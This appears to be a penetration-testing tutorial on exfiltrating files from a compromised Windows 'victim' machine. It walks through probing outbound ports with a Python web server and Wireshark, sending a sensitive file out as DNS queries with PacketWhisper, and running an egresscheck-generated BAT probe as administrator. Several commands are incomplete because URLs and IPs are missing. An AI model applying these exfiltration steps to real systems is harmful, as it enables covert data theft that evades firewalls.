Data Exfiltration Techniques

Equipped with remote access to a machine we want to find ways of exfiltrating data without changing any firewall setting. Here's what we are going to do:

⇒ Tools used: Packet Whisper, Wireshark, rdesktop, Egress framework
Network Configuration: Intranet Subnet: Under-investigation machine's IP: Connection Type: RDP

Connect to and scrutinize the victim machine

To establish the remote connection we use rdesktop in terminal as follows:
$ rdesktop

Once we authenticate to the victim we search for interesting files. On a windows machine it's good to know if Python or Powershell are installed. We can check this in the Windows terminal (cmd.exe) with

python --version
powershell ls

Identify if the machine allows any of the commonly used ports for outbound connectivity
  1. Launch a Python server specifying the port of choice in your attacker machine.

$ cd /tmp 
$ python -m SimpleHTTPServer 8080

  1. Identify the IP address of your attacking machine
$ ifconfig

Let's say we have (attacker machine)

  1. Launch a browser on the machine (victim) and navigate to

when testing if port 8080 is allowed outbound connectivity and see if the served by the Python server page loads. If this is the case, the port is allowed outbound connectivity. Otherwise the firewall is blocking access to this specific port.
The webiste will present you with the files of the /tmp directory where the Python server was started. If any files exist you will be able to download them.

Inside a real world scenario you can simply launch Wireshark and see if you can sniff any DNS requests originating from the machine.If this was the case then port 53 (UDP) is allowed for outbound connectivity.

Let's summarize that we have identified ports 8080 (TCP) and 53 (UDP) allowed for outbound connectivity.

Exfiltrate a file

Based on the identified ports the stealthier exfiltration way is through port 53 (UDP). PacketWhisper can help to easil exfiltrate data via DNS requests. It's a Python based tool that you can download from github.

$ git clone

Since we're using the /tmp/server path you can execute above command inside any directory you want.

For easier transfer also download PacketWhisper as a zipped file as follows:

$ wget

You then run a Python server in the directory where you saved the zipped version of PacketWhisper.
$ python -m SimpleHTTPServer 8080

Then you point the browser on the victim machine to your attacking machine IP and port 8080 in order to download the tool.

Time to launch PacketWhisper
  • Launch Wireshark on your attacking machine
  • Launch cmd.exe on the victim machine and go to the PacketWhisper directory
  • Copy the file you want to transfer into the PacketWhisper directory
  • Launch PacketWhisper

$ cd c:\Users\Admin\Desktop\PacketWhisper-master\
$ copy c:\Documents\Sensitive\file.txt .\file.txt
$ python
[enter] (leave empty)

Transmission will now begin. It is slow and takes about 20 minutes to finish the exfiltration. Once finished you will see something similar to the screenshot below.


In your attacking machine on Wireshark you will be able to see DNS queries to subdomains of

Save the Wireshark capture file with ‘.pcap’ extension. Next, copy the saved pcap file inside the PacketWhispe's directory, for example 'capture.pcap'

Open a new terminal, go to PacketWhisper's directory and execute the following.

$ python

The file is now decrypted. To view its content double click the file or read it with

$ cat decloaked.capture

Automate enumerating all the exfiltration paths and Identify open ports

Let's use egresscheck framework for identifying ports that are allowed outbound connectivity.

$ git clone
$ cd egresscheck-framework/
$ ./

You need to configure the tool by specifying:

  • your machine's IP (TARGETIP)
  • victim's IP (SOURCEIP)
  • port range (PORTS)
  • the protocol (PROTOCOL)

You can do so as follows:

$ egresschecker> set PORTS 8500-9500
PORTS => 8500-9500(1001ports)

$ egresschecker> set TARGETIP

$ egresschecker> set SOURCEIP

$ egresschecker> set PROTOCOL tcp

$ egresschecker> generate powershell-cmd

A code will be generated that makes PowerShell try to access every port from the given range from the victim machine on your attacker machine.

Before initiating the procedure on the victim machine make sure to

  • transfer this command to the victim machine
  • run Wireshark on your attacking machine
  • execute the command on the victim machine

You can transfer the command using the Python server as before. Simply go to the directory where the egresscheck framework generated a BAT file. Egresscheck informs you of this BAT file with a message, similar to this one:

```bash "Also written to:/tmp/egress_2019jan16_125152_VNcIt8.bat" ```

To serve it use the Python server.

$ cd tmp
$ python -m SimpleHTTPServer 8080

Now, go to the victim machine and point the browser to the attacking machine again. Download the .bat file on the victim machine. Go back to your attacking machine, execute Wireshark again. Now, go to the victim machine and right-click the downloaded BAT file and click “Run as administrator.”

Now, go to your attacking machine, check Wireshark and observe the traffic. If there is another hidden open port in the network in Wireshark it will now show.

After a short period of time - and if we are lucky - Wireshark will receive a packet destined to an open port –which means that this port is also allowed outbound connectivity on the victim machine’s firewall. In case you can't use nmap this is a useful tool to have in mind.